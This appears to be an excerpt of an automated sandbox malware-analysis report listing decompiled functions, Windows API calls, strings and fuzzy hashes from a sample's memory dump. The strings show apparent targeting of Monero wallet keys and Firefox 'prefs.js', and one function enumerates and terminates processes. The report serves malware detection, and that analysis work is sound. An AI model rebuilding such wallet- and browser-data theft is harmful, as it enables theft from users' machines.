                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 180737720-4073750446
                                        • Opcode ID: 596692e80681df40ab326e665a6a1d6b8147cf328c8a58b4060e886f25ffaef7
                                        • Instruction ID: 8064c9b3994f5b72ac2bf258a957d8eee4509a1a7199ace3b1e0e3887277e521
                                        • Opcode Fuzzy Hash: 596692e80681df40ab326e665a6a1d6b8147cf328c8a58b4060e886f25ffaef7
                                        • Instruction Fuzzy Hash: 905188B6904118ABCB24FBB0DC85FEE737CBF94300F404688B61996150EB749B88CF90
                                        Function 0097EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • wsprintfA.USER32 ref: 0097EE3E
                                        • FindFirstFileA.KERNEL32(?,?), ref: 0097EE55
                                        • StrCmpCA.SHLWAPI(?,00991630), ref: 0097EEAB
                                        • StrCmpCA.SHLWAPI(?,00991634), ref: 0097EEC1
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097F3AE
                                        • FindClose.KERNEL32(000000FF), ref: 0097F3C3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Find$File$CloseFirstNextwsprintf
                                        • String ID: %s\*.*
                                        • API String ID: 180737720-1013718255
                                        • Opcode ID: 88a5c89332c59a4011c9b9f383d6a748599cab7c832f8abef97cb914abf92329
                                        • Instruction ID: 25392b92dd5fd47a609ea5391a586534220c8f57b4e0951dbc2348c42d4d183f
                                        • Opcode Fuzzy Hash: 88a5c89332c59a4011c9b9f383d6a748599cab7c832f8abef97cb914abf92329
                                        • Instruction Fuzzy Hash: 16E1B4729111189AEB54FB60DD62FEE733DBF94300F4045DAB50A62192EF386B89CF51
                                        Function 009B0098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                        • API String ID: 0-1562099544
                                        • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction ID: 4ea20c9cd5496030d1aacf9f4323f6df4b60e257db2e7eb50d3f37544395a9d5
                                        • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                        • Instruction Fuzzy Hash: 2DE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                        Function 0097F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009916B0,00990D97), ref: 0097F81E
                                        • StrCmpCA.SHLWAPI(?,009916B4), ref: 0097F86F
                                        • StrCmpCA.SHLWAPI(?,009916B8), ref: 0097F885
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097FBB1
                                        • FindClose.KERNEL32(000000FF), ref: 0097FBC3
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID: prefs.js
                                        • API String ID: 3334442632-3783873740
                                        • Opcode ID: 1cfef1f428a99b500d6deb5c159b95a46bc826232fc602e6236a39bc7f76db68
                                        • Instruction ID: 89aab1f3c2a22009b87abf408d4bfb6bfae86687b18233ac4fa24ba2cb06dc57
                                        • Opcode Fuzzy Hash: 1cfef1f428a99b500d6deb5c159b95a46bc826232fc602e6236a39bc7f76db68
                                        • Instruction Fuzzy Hash: 07B113729001189BDB28FF64DDA6FED7379BF94300F0085A9E50E66291EF345B49CB92
                                        Function 00971710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0099523C,?,?,?,009952E4,?,?,00000000,?,00000000), ref: 00971963
                                        • StrCmpCA.SHLWAPI(?,0099538C), ref: 009719B3
                                        • StrCmpCA.SHLWAPI(?,00995434), ref: 009719C9
                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00971D80
                                        • DeleteFileA.KERNEL32(00000000), ref: 00971E0A
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00971E60
                                        • FindClose.KERNEL32(000000FF), ref: 00971E72
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                        • String ID: \*.*
                                        • API String ID: 1415058207-1173974218
                                        • Opcode ID: e81f8f10bd455fb09f426d15dccee614cf08851e422e4eb082a6d29b68aaa1b6
                                        • Instruction ID: 9e3b4b313a59e872e13f904ce3e3f677ff78ac456019dd7fb7c46da0c1e00f2a
                                        • Opcode Fuzzy Hash: e81f8f10bd455fb09f426d15dccee614cf08851e422e4eb082a6d29b68aaa1b6
                                        • Instruction Fuzzy Hash: 5D12D4719101189BDB15FB64CCA6FEE7379BFA4300F4045DAB50A62191EF386B89CF51
                                        Function 0097DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00990C32), ref: 0097DF5E
                                        • StrCmpCA.SHLWAPI(?,009915C0), ref: 0097DFAE
                                        • StrCmpCA.SHLWAPI(?,009915C4), ref: 0097DFC4
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097E4E0
                                        • FindClose.KERNEL32(000000FF), ref: 0097E4F2
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                        • String ID: \*.*
                                        • API String ID: 2325840235-1173974218
                                        • Opcode ID: b46ef4d0c0d73cf8a0de6335ff7441f6bd19b6be9c57eebe38588952e52f3425
                                        • Instruction ID: b4de6f834dbff58ff45b58e5723e957a05474ba6766822d2080f9e752b2c8920
                                        • Opcode Fuzzy Hash: b46ef4d0c0d73cf8a0de6335ff7441f6bd19b6be9c57eebe38588952e52f3425
                                        • Instruction Fuzzy Hash: 1AF18D719141189BDB15FB60CDA6FEE7339BFA4300F4045DAB41A62191EF386B89CF52
                                        Function 00DC5102 Relevance: 14.1, Strings: 10, Instructions: 1575COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ![r$>n~k$>~hw$Trw_$Yiq?$w0H_$:Uf$U{]$U{]$x]
                                        • API String ID: 0-33530090
                                        • Opcode ID: ecbc98dd69ca4ef8c2a00a83ccdfcae7d027364f8f597372c8d52801db50b004
                                        • Instruction ID: 1a796def94d77c08e182329add66cd369d3e541501edb2b3bf88a0bd3638be93
                                        • Opcode Fuzzy Hash: ecbc98dd69ca4ef8c2a00a83ccdfcae7d027364f8f597372c8d52801db50b004
                                        • Instruction Fuzzy Hash: 74B2F5B3A082009FE7046F2DEC8567AFBE9EF94320F1A493DEAC5D7740E67558048796
                                        Function 0097DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0098AA50: lstrcpy.KERNEL32(00990E1A,00000000), ref: 0098AA98
                                          • Part of subcall function 0098AC30: lstrcpy.KERNEL32(00000000,?), ref: 0098AC82
                                          • Part of subcall function 0098AC30: lstrcat.KERNEL32(00000000), ref: 0098AC92
                                          • Part of subcall function 0098ACC0: lstrlen.KERNEL32(?,01818C08,?,\Monero\wallet.keys,00990E1A), ref: 0098ACD5
                                          • Part of subcall function 0098ACC0: lstrcpy.KERNEL32(00000000), ref: 0098AD14
                                          • Part of subcall function 0098ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0098AD22
                                          • Part of subcall function 0098ABB0: lstrcpy.KERNEL32(?,00990E1A), ref: 0098AC15
                                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,009915A8,00990BAF), ref: 0097DBEB
                                        • StrCmpCA.SHLWAPI(?,009915AC), ref: 0097DC33
                                        • StrCmpCA.SHLWAPI(?,009915B0), ref: 0097DC49
                                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0097DECC
                                        • FindClose.KERNEL32(000000FF), ref: 0097DEDE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                        • String ID:
                                        • API String ID: 3334442632-0
                                        • Opcode ID: e7fbd5261f2c649cd9f37dfce4828a945577cb9f8c788f26a2f847c159bd09e9
                                        • Instruction ID: 5fe1b9f7e87148d381f3a80b1ea5057ca6265a18eece34d2994f1ed170e506d4
                                        • Opcode Fuzzy Hash: e7fbd5261f2c649cd9f37dfce4828a945577cb9f8c788f26a2f847c159bd09e9
                                        • Instruction Fuzzy Hash: 94910373A001049BDB14FB74DD96BED737DAFD4300F008669F95A56581EE389B48CB92
                                        Function 00DC8D4F Relevance: 12.4, Strings: 9, Instructions: 1122COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: "o}$9a?w$>oo]$Xfgc$o_>]$tWn_$}<M?$oW]$oW]
                                        • API String ID: 0-3147922533
                                        • Opcode ID: 56bda2e1028b7136bd8954a02843f910dc1c74dc5149ce9bd9b9e80ca1690d1d
                                        • Instruction ID: 1e1eec869d1fefbae257569e081fb6c077f0dfcc3b7c5ffabf2a58002cefaef4
                                        • Opcode Fuzzy Hash: 56bda2e1028b7136bd8954a02843f910dc1c74dc5149ce9bd9b9e80ca1690d1d
                                        • Instruction Fuzzy Hash: 8D7249F360C2049FE7046E1DEC8577ABBE9EF94360F1A463DEAC483744E63598058697
                                        Function 009898E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00989905
                                        • Process32First.KERNEL32(00979FDE,00000128), ref: 00989919
                                        • Process32Next.KERNEL32(00979FDE,00000128), ref: 0098992E
                                        • StrCmpCA.SHLWAPI(?,00979FDE), ref: 00989943
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0098995C
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 0098997A
                                        • CloseHandle.KERNEL32(00000000), ref: 00989987
                                        • CloseHandle.KERNEL32(00979FDE), ref: 00989993
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmpDownload File
